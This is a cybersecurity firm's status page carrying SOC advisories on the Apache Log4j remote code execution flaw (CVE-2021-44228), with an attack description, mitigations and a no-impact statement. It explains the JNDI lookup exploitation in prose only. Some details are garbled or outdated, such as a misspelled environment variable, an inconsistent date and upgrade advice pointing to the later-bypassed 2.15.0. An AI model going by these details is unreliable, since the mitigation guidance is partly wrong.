CyFlare System Status Page
Update - Dear Valued Subscriber,

CyFlare has completed a comprehensive audit of its internal and commercial systems, including our SIEM, advanced endpoint, vulnerability scanning, systems management, and SOAR tools. As a result, it is reasonably established that CyFlare is not impacted by the Apache Log4j vulnerabilities identified as CVE-2021-44228 and CVE-2021-45046.

CyFlare does not leverage any of the related components within its applications.

Furthermore, our upstream vendors have provided CyFlare with written statements of no impact. Therefore, there is no remediation required for any CyFlare services at this time. We further validated these statements by conducting internal vulnerability scans and engineering reviews and established that these systems are not affected. We are continuously monitoring the situation and will publish further updates as needed. If you have any questions or concerns, please do not hesitate to reach out to us at socir@cyflare.com.

Thank you,
The CyFlare SOC Team
Jan 4, 18:36 EST
Update - We are continuing to monitor for any further issues.
Dec 14, 13:09 EST
Monitoring - SOC ADVISORY - *** Apache Log4j (CVE-2021-44228) ***

New incident: Monitoring

***SOC ADVISORY *** Apache Log4j (CVE-2021-44228)

Posted Date: 12-13-21

Published Date: 12-10-21

Sources: CISA, Microsoft

DATE(S) ISSUED: 10-18-21

SUBJECT: Apache Log4j (CVE-2021-44228)

SEVERITY: Critical

BASE CVSS Score: 10.0

OVERVIEW: “The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.”

THREAT INTELLIGENCE: There are currently no reports of these vulnerabilities being exploited in

SYSTEMS AFFECTED: Apache Log4j v2.0-beta9 - 2.14.1

TECHNICAL SUMMARY: On December 6th, 2021, Apache released version 2.15.0 for Log4j, meant to address a vulnerability present in previous versions 2.0-beta9 to 2.14.1. This vulnerability allows attackers to perform remote code execution using JNDI lookups. Attackers that can control log messages or the log message parameters can execute code queried from LDAP servers when such parameters are enabled.

The attack occurs in servers hosting a vulnerable version of Log4j. Attackers will insert a JNDI lookup string in a header field containing queries to external servers. This string is then passed onto Log4j to be logged, where Log4j interprets the string and queries the specified malicious server. The server responds with malicious Java code provided by an external server and downloads and executes the code.

This vulnerability is listed as critical in severity, and users are recommended to upgrade all Apache Log4j servers to 2.15 and download the required security patches as soon as possible.

IOC Repositories:
https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8
https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217

MITIGATIONS/RECOMMENDATIONS: Microsoft recommends immediately applying all security patches relating to this vulnerability to remediate it. See the Apache CVE and security advisory for more details:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
https://logging.apache.org/log4j/2.x/security.html

The recommended action is to upgrade Log4j versions from 2.0 to 2.15.0. However, several workarounds exist to temporarily mitigate the vulnerability if this cannot be accomplished.

Log4j versions 2.10 to 2.14.1 allow for the parameter “log4j2.formatMsgNoLookups” to be set to “true” to disable the lookup feature that is exploited. The parameter “OG4J_FORMAT_MSG_NO_LOOKUPS” can be set to “true” to enforce the change as well.

Log4j versions 2.0-beta9 to 2.10 should have the JndiLookup class from the class path “zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class” disabled to temporarily mitigate the vulnerability.

STEPS TAKEN BY CYFLARE: CyFlare has detected this vulnerability activity across several clients and has notified them appropriately. Custom ATH rules have been created to detect and alert behavior regarding the vulnerability. Stellar Cyber BDS’s threat intelligence sources also have updated IDS signatures to accommodate this vulnerability, and all exploit attempt detections will alert on events involving “log4j”. CyFlare will continue to track the status of this vulnerability and will provide updates and assistance to our clients regarding this matter.

SOURCES:
https://logging.apache.org/log4j/2.x/security.html
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
Dec 14, 13:09 EST
Monitoring - Dear Subscriber,

Yesterday, 12/10/2021, a critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, is being leveraged by attackers in the wild – for now, fortunately, primarily to deliver coin miners.

The SOC is fully engaged in building a comprehensive threat advisory, threat hunting queries, and working with several clients on the matter affected by related exploitation attempts observed in their environments.

We will continue to hunt for related Indicators of Compromise throughout client environments and scan for the vulnerability within our clients that have the Vulnerability Management Service.

We can confirm that the Stellar Cyber – BDS platform’s IDS engine has been updated with new IDS signatures that would trigger security detections on exploitation attempts observed in network traffic.

In addition, the CyFlare SOC has also built its threat hunting queries & custom alarm (ATH) rule to trigger a security detection on exploit attempts. The rule has been enabled and successfully operationalized.

Customers of applications leveraging Apache log4j should upgrade to the newest version immediately.

Since the original patch was discovered to be bypassed, in the interest of implementing as many protections against this vulnerability as possible, the following mitigations are also recommended:
• Disable suspicious outbound traffic, such as LDAP and RMI on the server in PANW Firewall.
• Disable JNDI lookup.
o Remove the JndiLookup file in the log4j-core and restart the service.
o Setup spring.jndi.ignore=true

Reference Links:
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
https://logging.apache.org/log4j/2.x/security.html
https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/

Should you have any questions or concerns, please place a ticket with the SOC using socir@cyflare.com or call 877.729.3527 extension 2.

Thank you,
Your CyFlare SOC
Dec 11, 16:49 EST
Breach Detection Service ? Operational
90 days ago
100.0 % uptime
Today
Rochester SOC Internet & Phones Operational
90 days ago
100.0 % uptime
Today
CyFlare Support Desk Platform ? Operational
90 days ago
100.0 % uptime
Today
Operational
Degraded Performance
Partial Outage
Major Outage
Maintenance
Major outage
Partial outage
No downtime recorded on this day.
No data exists for this day.
had a major outage.
had a partial outage.
Past Incidents
Jan 22, 2022

No incidents reported today.

Jan 21, 2022

No incidents reported.

Jan 20, 2022

No incidents reported.

Jan 19, 2022

No incidents reported.

Jan 18, 2022

No incidents reported.

Jan 17, 2022

No incidents reported.

Jan 16, 2022

No incidents reported.

Jan 15, 2022

No incidents reported.

Jan 14, 2022

No incidents reported.

Jan 13, 2022

No incidents reported.

Jan 12, 2022

No incidents reported.

Jan 11, 2022

No incidents reported.

Jan 10, 2022

No incidents reported.

Jan 9, 2022

No incidents reported.

Jan 8, 2022

No incidents reported.